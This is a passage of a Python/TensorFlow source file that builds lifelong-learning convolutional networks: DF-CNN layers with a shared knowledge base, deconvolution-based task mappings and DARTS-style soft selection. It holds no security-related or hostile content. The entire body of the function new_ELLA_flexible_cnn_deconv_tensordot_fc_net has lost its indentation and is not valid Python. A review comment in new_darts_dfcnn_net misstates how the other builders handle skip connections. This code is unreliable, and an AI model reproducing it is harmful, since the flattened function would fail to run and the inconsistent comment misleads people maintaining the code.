    TS_params are given; newly created KB/TS variables are accumulated into the
    returned lists. KB_sizes holds three entries per layer, TS variables five.

    Returns:
    (layers, KB_params, TS_params, cnn_gen_params, output_dim)
    """
    _num_TS_param_per_layer = 5
    ## create-new-parameter flags, derived from which parameter lists were supplied:
    ## [0] new KB & new TS / [1] new TS only / [2] reuse both / [3] new KB only
    control_flag = [(KB_params is None and TS_params is None), (not (KB_params is None) and (TS_params is None)), not (KB_params is None or TS_params is None), ((KB_params is None) and not (TS_params is None))]
    if control_flag[1]:
        TS_params = []
    elif control_flag[3]:
        KB_params = []
    elif control_flag[0]:
        KB_params, TS_params = [], []
    cnn_gen_params = []
    layers_for_skip, next_skip_connect = [net_input], None
    # True when the corresponding parameter set must be created inside the layer builder
    make_new_KB = control_flag[0] or control_flag[3]
    make_new_TS = control_flag[0] or control_flag[1]
    with tf.name_scope('ELLA_cdnn_net'):
        layers = []
        for layer_cnt in range(len(k_sizes)//2):
            next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else next_skip_connect
            if next_skip_connect is None:
                skip_connect_in, skip_connect_out = -1, -1
            else:
                skip_connect_in, skip_connect_out = next_skip_connect
                assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
            if layer_cnt == skip_connect_out:
                # replay the pooling applied on the main path so the stored activation matches in size
                processed_skip_connect_input = layers_for_skip[skip_connect_in]
                for in_between_cnt in range(skip_connect_in, skip_connect_out):
                    if max_pool and (pool_sizes[2*in_between_cnt]>1 or pool_sizes[2*in_between_cnt+1]>1):
                        pool_shape = [1]+pool_sizes[2*in_between_cnt:2*(in_between_cnt+1)]+[1]
                        processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=pool_shape, strides=pool_shape, padding=padding_type)
            else:
                processed_skip_connect_input = None
            # single call replacing the original eight-way branch: the layer input and the
            # KB/TS variables to reuse are selected up-front, all other arguments are shared
            # (note KB_sizes carries three entries per layer in this version)
            layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_tensordot_layer2(net_input if layer_cnt < 1 else layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[3*layer_cnt:3*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None if make_new_KB else KB_params[layer_cnt], TS_param=None if make_new_TS else TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
            layers.append(layer_tmp)
            layers_for_skip.append(layer_tmp)
            cnn_gen_params = cnn_gen_params + cnn_gen_para_tmp
            # collect only the parameter sets that were created in this call
            if make_new_KB:
                KB_params = KB_params + KB_para_tmp
            if make_new_TS:
                TS_params = TS_params + TS_para_tmp
            if layer_cnt == skip_connect_out:
                next_skip_connect = None
        #### flatten the final feature map if requested
        if flat_output:
            output_dim = [int(layers[-1].shape[1]*layers[-1].shape[2]*layers[-1].shape[3])]
            layers.append(tf.reshape(layers[-1], [-1, output_dim[0]]))
        else:
            output_dim = layers[-1].shape[1:]
        #### optional dropout on the last layer
        if dropout:
            layers.append(tf.nn.dropout(layers[-1], dropout_prob))
    return (layers, KB_params, TS_params, cnn_gen_params, output_dim)
#### function to generate network of cnn (with shared KB through deconv)-> simple ffnn
def new_ELLA_cnn_deconv_tensordot_fc_net2(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, cnn_para_activation_fn=tf.nn.relu, cnn_KB_params=None, cnn_TS_params=None, fc_activation_fn=tf.nn.relu, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, input_size=[0, 0], output_type=None, task_index=0, skip_connections=[]):
    """Build a DF-CNN (tensordot ver2) conv front-end followed by a fully-connected head.

    The conv part is built with flat_output=True so its last layer feeds the FC net.

    Returns:
    (all_layers, cnn_KB_params, cnn_TS_params, cnn_gen_params, fc_params)
    """
    ## convolutional front-end (shared KB with leading dim, double-tensordot generation)
    conv_layers, kb_vars, ts_vars, gen_vars, _ = new_ELLA_cnn_deconv_tensordot_net2(net_input, k_sizes, ch_sizes, stride_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_params=cnn_KB_params, TS_params=cnn_TS_params, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_sizes=pool_sizes, dropout=dropout, dropout_prob=dropout_prob, flat_output=True, input_size=input_size, task_index=task_index, skip_connections=skip_connections)
    ## fully-connected head on top of the flattened conv output
    fc_layers, fc_vars = new_fc_net(conv_layers[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
    return (conv_layers + fc_layers, kb_vars, ts_vars, gen_vars, fc_vars)
##############################################################################################################
#### functions for Conv-FC nets whose conv layers are freely set to shared across tasks by DeconvFactor ####
##############################################################################################################
def new_ELLA_flexible_cnn_deconv_tensordot_fc_net(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, cnn_sharing, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, cnn_para_activation_fn=tf.nn.relu, cnn_KB_params=None, cnn_TS_params=None, cnn_params=None, fc_activation_fn=tf.nn.relu, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, input_size=[0, 0], output_type=None, task_index=0, skip_connections=[], highway_connect_type=0, cnn_highway_params=None, trainable=True, trainable_KB=True):
_num_TS_param_per_layer = 4
num_conv_layers = [len(k_sizes)//2, len(ch_sizes)-1, len(stride_sizes)//2, len(cnn_sharing), len(cnn_KB_sizes)//2, len(cnn_TS_sizes)//2, len(cnn_TS_stride_sizes)//2]
assert (all([(num_conv_layers[i]==num_conv_layers[i+1]) for i in range(len(num_conv_layers)-1)])), "Parameters related to conv layers are wrong!"
num_conv_layers = num_conv_layers[0]
'''
if cnn_KB_params is not None:
assert (len(cnn_KB_params) == 1), "Given init value of KB (last layer) is wrong!"
if cnn_TS_params is not None:
assert (len(cnn_TS_params) == 4), "Given init value of TS (last layer) is wrong!"
'''
## add CNN layers
## first element : make new KB&TS / second element : make new TS / third element : not make new para / fourth element : make new KB
control_flag = [(cnn_KB_params is None and cnn_TS_params is None), (not (cnn_KB_params is None) and (cnn_TS_params is None)), not (cnn_KB_params is None or cnn_TS_params is None), ((cnn_KB_params is None) and not (cnn_TS_params is None))]
if control_flag[1]:
cnn_TS_params = []
elif control_flag[3]:
cnn_KB_params = []
elif control_flag[0]:
cnn_KB_params, cnn_TS_params = [], []
cnn_gen_params = []
if cnn_params is None:
cnn_params = [None for _ in range(2*num_conv_layers)]
layers_for_skip, next_skip_connect = [net_input], None
with tf.name_scope('Hybrid_DFCNN'):
cnn_model, cnn_params_to_return, cnn_highway_params_to_return = [], [], []
cnn_KB_to_return, cnn_TS_to_return = [], []
for layer_cnt in range(num_conv_layers):
KB_para_tmp, TS_para_tmp, para_tmp = [None], [None for _ in range(_num_TS_param_per_layer)], [None, None]
highway_para_tmp = [None, None] if cnn_highway_params is None else cnn_highway_params[2*layer_cnt:2*(layer_cnt+1)]
cnn_gen_para_tmp = [None, None]
next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else next_skip_connect
if next_skip_connect is not None:
skip_connect_in, skip_connect_out = next_skip_connect
assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
else:
skip_connect_in, skip_connect_out = -1, -1
if layer_cnt == skip_connect_out:
processed_skip_connect_input = layers_for_skip[skip_connect_in]
for layer_cnt_tmp in range(skip_connect_in, skip_connect_out):
if max_pool and (pool_sizes[2*layer_cnt_tmp]>1 or pool_sizes[2*layer_cnt_tmp+1]>1):
processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], strides=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], padding=padding_type)
else:
processed_skip_connect_input = None
if layer_cnt == 0:
if control_flag[0] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[1] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=cnn_KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[2] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=cnn_KB_params[layer_cnt], TS_param=cnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[3] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=None, TS_param=cnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif (not cnn_sharing[layer_cnt]):
layer_tmp, para_tmp = new_cnn_layer(layer_input=net_input, k_size=k_sizes[2*layer_cnt:2*(layer_cnt+1)]+ch_sizes[layer_cnt:layer_cnt+2], stride_size=[1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], activation_fn=cnn_activation_fn, weight=cnn_params[2*layer_cnt], bias=cnn_params[2*layer_cnt+1], padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, trainable=trainable)
else:
if control_flag[0] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(cnn_model[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[1] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(cnn_model[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=cnn_KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[2] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(cnn_model[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=cnn_KB_params[layer_cnt], TS_param=cnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[3] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(cnn_model[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=None, TS_param=cnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif (not cnn_sharing[layer_cnt]):
layer_tmp, para_tmp = new_cnn_layer(layer_input=cnn_model[layer_cnt-1], k_size=k_sizes[2*layer_cnt:2*(layer_cnt+1)]+ch_sizes[layer_cnt:layer_cnt+2], stride_size=[1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], activation_fn=cnn_activation_fn, weight=cnn_params[2*layer_cnt], bias=cnn_params[2*layer_cnt+1], padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, trainable=trainable)
cnn_model.append(layer_tmp)
layers_for_skip.append(layer_tmp)
cnn_KB_to_return = cnn_KB_to_return + KB_para_tmp
cnn_TS_to_return = cnn_TS_to_return + TS_para_tmp
cnn_params_to_return = cnn_params_to_return + para_tmp
cnn_gen_params = cnn_gen_params + cnn_gen_para_tmp
cnn_highway_params_to_return = cnn_highway_params_to_return + highway_para_tmp
if layer_cnt == skip_connect_out:
next_skip_connect = None
#### flattening output
output_dim = [int(cnn_model[-1].shape[1]*cnn_model[-1].shape[2]*cnn_model[-1].shape[3])]
cnn_model.append(tf.reshape(cnn_model[-1], [-1, output_dim[0]]))
#### add dropout layer
if dropout:
cnn_model.append(tf.nn.dropout(cnn_model[-1], dropout_prob))
## add fc layers
fc_model, fc_params = new_fc_net(cnn_model[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net', trainable=trainable)
#return (cnn_model+fc_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, cnn_params_to_return, cnn_highway_params_to_return, fc_params)
return (cnn_model+fc_model, cnn_KB_to_return, cnn_TS_to_return, cnn_gen_params, cnn_params_to_return, cnn_highway_params_to_return, fc_params)
#### function to generate DARTS-based network for selective sharing on DF-CNN
def new_darts_dfcnn_layer(layer_input, k_size, ch_size, stride_size, KB_size, TS_size, TS_stride_size, layer_num, task_num, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_param=None, TS_param=None, conv_param=None, select_param=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pooling=False, pool_size=None, trainable=True, skip_connect_input=None, name_scope='darts_dfcnn_layer', use_numpy_var_in_graph=False):
    """Build one DARTS-based DF-CNN conv layer with soft operation selection.

    Two candidate operations are computed on ``layer_input``:
      1. a 'shared' convolution whose kernel is generated from the knowledge
         base (``KB_param``) through a deconv + tensordot task-specific
         mapping (DF-CNN style), and
      2. a plain task-specific convolution (``conv_param``),
    and their outputs are mixed by a softmax over the 2-element DARTS
    selection logits ``select_param`` (index 0 weights the task-specific
    branch, index 1 the shared branch — see the tf.stack order below).

    Each of KB_param/TS_param/conv_param/select_param may be None (fresh
    variables are created) or hold numpy arrays (converted back into graph
    variables unless ``use_numpy_var_in_graph`` is True).

    Returns:
        (layer, [KB_param], TS_param, conv_param, [select_param])
    """
    with tf.name_scope(name_scope):
        ## init DF-CNN KB (shared knowledge base) params
        if KB_param is None or (isinstance(KB_param, np.ndarray) and not use_numpy_var_in_graph):
            KB_param = new_ELLA_KB_param([1, KB_size[0], KB_size[0], KB_size[1]], layer_num, task_num, KB_reg_type, KB_param, trainable=trainable)
        ## init DF-CNN task-specific mapping params (deconv filter/bias, tensordot map, conv bias)
        if TS_param is None or (isinstance(TS_param, np.ndarray) and not use_numpy_var_in_graph):
            TS_param = new_ELLA_cnn_deconv_tensordot_TS_param([[TS_size[0], TS_size[0], TS_size[1], KB_size[1]], [1, 1, 1, TS_size[1]], [TS_size[1], ch_size[0], ch_size[1]], [ch_size[1]]], layer_num, task_num, TS_reg_type, [None, None, None, None] if TS_param is None else TS_param, trainable=trainable)
        ## init plain task-specific conv params (weight, bias)
        if conv_param is None:
            conv_param = [new_weight(shape=k_size+ch_size, trainable=trainable), new_bias(shape=[ch_size[-1]], trainable=trainable)]
        else:
            if conv_param[0] is None or (isinstance(conv_param[0], np.ndarray) and not use_numpy_var_in_graph):
                conv_param[0] = new_weight(shape=k_size+ch_size, init_tensor=conv_param[0], trainable=trainable)
            if conv_param[1] is None or (isinstance(conv_param[1], np.ndarray) and not use_numpy_var_in_graph):
                conv_param[1] = new_bias(shape=[ch_size[-1]], init_tensor=conv_param[1], trainable=trainable)
        ## init DARTS-selection logits (initialized to zeros -> uniform mixing)
        if select_param is None:
            select_param = new_weight(shape=[2], init_tensor=np.zeros(2, dtype=np.float32), trainable=trainable)
        elif isinstance(select_param, np.ndarray) and not use_numpy_var_in_graph:
            select_param = new_weight(shape=[2], init_tensor=select_param, trainable=trainable)
        with tf.name_scope('DFCNN_param_gen'):
            ## generate the shared conv kernel: deconv the KB, then tensordot over channels
            para_tmp = tf.add(tf.nn.conv2d_transpose(KB_param, TS_param[0], [1, k_size[0], k_size[1], TS_size[1]], strides=[1, TS_stride_size[0], TS_stride_size[1], 1]), TS_param[1])
            para_tmp = tf.reshape(para_tmp, [k_size[0], k_size[1], TS_size[1]])
            if para_activation_fn is not None:
                para_tmp = para_activation_fn(para_tmp)
            W = tf.tensordot(para_tmp, TS_param[2], [[2], [0]])
            b = TS_param[3]
        ## softmax over the 2 selection logits, shaped for the tensordot below
        mixing_weight = tf.reshape(tf.nn.softmax(select_param), [2, 1])
        shared_conv_layer = tf.nn.conv2d(layer_input, W, strides=stride_size, padding=padding_type) + b
        TS_conv_layer = tf.nn.conv2d(layer_input, conv_param[0], strides=stride_size, padding=padding_type) + conv_param[1]
        if skip_connect_input is not None:
            ## residual-style skip connection is added to BOTH branches; shapes must match exactly
            shape1, shape2 = shared_conv_layer.get_shape().as_list(), skip_connect_input.get_shape().as_list()
            assert (len(shape1) == len(shape2)), "Shape of layer's output and input of skip connection do not match!"
            assert (all([(x==y) for (x, y) in zip(shape1, shape2)])), "Shape of layer's output and input of skip connection do NOT match!"
            shared_conv_layer = shared_conv_layer + skip_connect_input
            TS_conv_layer = TS_conv_layer + skip_connect_input
        if activation_fn is not None:
            shared_conv_layer = activation_fn(shared_conv_layer)
            TS_conv_layer = activation_fn(TS_conv_layer)
        ## soft mixture of the two candidate outputs, then drop the trailing singleton dim
        mixed_conv_temp = tf.tensordot(tf.stack([TS_conv_layer, shared_conv_layer], axis=4), mixing_weight, axes=[[4], [0]])
        conv_layer = tf.reshape(mixed_conv_temp, mixed_conv_temp.get_shape()[0:-1])
        if max_pooling and (pool_size[1] > 1 or pool_size[2] > 1):
            layer = tf.nn.max_pool(conv_layer, ksize=pool_size, strides=pool_size, padding=padding_type)
        else:
            layer = conv_layer
    return (layer, [KB_param], TS_param, conv_param, [select_param])
def new_darts_dfcnn_net(net_input, k_sizes, ch_sizes, stride_sizes, dfcnn_KB_sizes, dfcnn_TS_sizes, dfcnn_TS_stride_sizes, activation_fn=tf.nn.relu, dfcnn_TS_activation_fn=tf.nn.relu, dfcnn_KB_params=None, dfcnn_TS_params=None, cnn_TS_params=None, select_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, flat_output=False, trainable=True, task_index=0, skip_connections=None, use_numpy_var_in_graph=False):
    """Build a stack of DARTS DF-CNN layers (see new_darts_dfcnn_layer).

    Per-layer hyper-parameters are packed flat: two entries per layer in
    k_sizes/stride_sizes/dfcnn_KB_sizes/dfcnn_TS_sizes/dfcnn_TS_stride_sizes/
    pool_sizes, len(ch_sizes)-1 layers, 4 TS params and 2 conv params per
    layer. Existing params may be passed to rebuild a saved model; which of
    dfcnn_KB_params/dfcnn_TS_params are given decides what is created anew.

    Returns:
        (layers, dfcnn_shared_params, dfcnn_TS_params, cnn_TS_params,
         select_params, output_dim)
    """
    _num_TS_param_per_layer = 4
    ## every per-layer hyper-parameter list must describe the same number of conv layers
    num_conv_layers = [len(k_sizes)//2, len(ch_sizes)-1, len(stride_sizes)//2, len(dfcnn_KB_sizes)//2, len(dfcnn_TS_sizes)//2, len(dfcnn_TS_stride_sizes)//2]
    assert (all([(num_conv_layers[i]==num_conv_layers[i+1]) for i in range(len(num_conv_layers)-1)])), "Parameters related to conv layers are wrong!"
    num_conv_layers = num_conv_layers[0]
    ## work on a copy: avoids the shared mutable-default-argument pitfall and keeps
    ## the pop() below from destructively consuming the caller's list
    skip_connections = list(skip_connections) if skip_connections is not None else []
    ## first element : make new KB&TS / second element : make new TS / third element : not make new para / fourth element : make new KB
    control_flag = [(dfcnn_KB_params is None and dfcnn_TS_params is None), (not (dfcnn_KB_params is None) and (dfcnn_TS_params is None)), not (dfcnn_KB_params is None or dfcnn_TS_params is None), ((dfcnn_KB_params is None) and not (dfcnn_TS_params is None))]
    if cnn_TS_params is None:
        cnn_TS_params = [None for _ in range(2*num_conv_layers)]
    else:
        assert(len(cnn_TS_params) == 2*num_conv_layers), "Check given parameters!"
    if select_params is None:
        select_params = [None for _ in range(num_conv_layers)]
    layers_for_skip, next_skip_connect = [net_input], None
    layers, dfcnn_shared_params_return, dfcnn_TS_params_return, cnn_TS_params_return, select_params_return = [], [], [], [], []
    with tf.name_scope('DARTS_DFCNN_net'):
        for layer_cnt in range(num_conv_layers):
            # NOTE(review): like the other *_net builders in this file, a pending
            # (unconsumed) skip connection is reset to None here rather than carried over.
            next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else None
            if next_skip_connect is not None:
                skip_connect_in, skip_connect_out = next_skip_connect
                assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
            else:
                skip_connect_in, skip_connect_out = -1, -1
            if layer_cnt == skip_connect_out:
                ## pool the skip-connected activation down so its spatial size matches this layer
                processed_skip_connect_input = layers_for_skip[skip_connect_in]
                for layer_cnt_tmp in range(skip_connect_in, skip_connect_out):
                    if max_pool and (pool_sizes[2*layer_cnt_tmp]>1 or pool_sizes[2*layer_cnt_tmp+1]>1):
                        processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], strides=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], padding=padding_type)
            else:
                processed_skip_connect_input = None
            ## the four control_flag cases (and the layer_cnt == 0 special case) only differ
            ## in the layer input and in which saved KB/TS params are reused, so compute
            ## those three arguments once instead of duplicating the layer-building call
            layer_input = net_input if layer_cnt == 0 else layers[layer_cnt-1]
            KB_param_in = dfcnn_KB_params[layer_cnt] if (control_flag[1] or control_flag[2]) else None
            TS_param_in = dfcnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)] if (control_flag[2] or control_flag[3]) else None
